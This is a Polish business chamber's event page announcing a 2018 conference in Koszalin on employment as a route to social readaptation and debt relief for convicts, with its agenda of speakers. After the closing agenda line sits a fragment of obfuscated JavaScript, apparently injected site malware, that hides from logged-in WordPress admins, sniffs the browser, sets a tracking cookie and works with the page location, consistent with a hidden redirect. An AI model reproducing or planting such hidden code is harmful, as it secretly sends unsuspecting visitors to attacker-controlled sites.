Zatrudnienie jako szansa na readaptację społeczną w kontekście pomocy skazanym w wychodzeniu z zadłużenia – konferencja | Północna Izba Gospodarcza w Koszalinie

Zapraszamy przedsiębiorców na konferencję na temat: „Zatrudnienie jako szansa na readaptację społeczną w kontekście pomocy skazanym w wychodzeniu z  zadłużenia” 16.03.2018r.

Konferencja odbędzie się w Delegaturze UW w Koszalinie.

10.00 – Powitanie uczestników – przez Pana Przewodniczącego Terenowej Rady   ds. Społecznej  Readaptacji i Pomocy Skazanym  dla Okręgu Koszalińskiego , Prezesa Sądu Okręgowego  SSO Marka Ciszewskiego.

10.10-10.45 „Ministerialny Program praca dla więźniów” – płk Andrzej Leńczuk Dyrektor Biura Penitencjarnego Centralnego Zarządu Służby Więziennej w Warszawie.

10.45 – 11.30 -„ Efekt tsunami „ – zadłużenie osobiste skazanych  barierą  w efektywnej readaptacji  osób zwalnianych z jednostek penitencjarnych , ze szczególnym uwzględnieniem zadłużenia alimentacyjnego ”. Pan Roman Pomianowski – psycholog  Stowarzyszenie Programu Wsparcia Zadłużonych   w Poznaniu .

Przerwa kawowa – 15 minut

11.45-12.30        Cd. wykładu Pan Roman Pomianowski – psycholog  Stowarzyszenie Programu Wsparcia Zadłużonych   w Poznaniu

20-12.40 Informacja o dostępnych projektach i programach dla pracodawców i osób skazanych  w zakresie zatrudnienia:

Pan Henryk Kozłowski Dyrektor Powiatowego Urzędu Pracy w Koszalinie

12.50- 13.10 Wystąpienie  Przedstawicieli Pracodawców

Przedstawienie swoich doświadczeń przez kontrahentów współpracujących z zakładami karnymi, dyskusja, wnioski

Podsumowanie i zakończenie konferencji . 'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m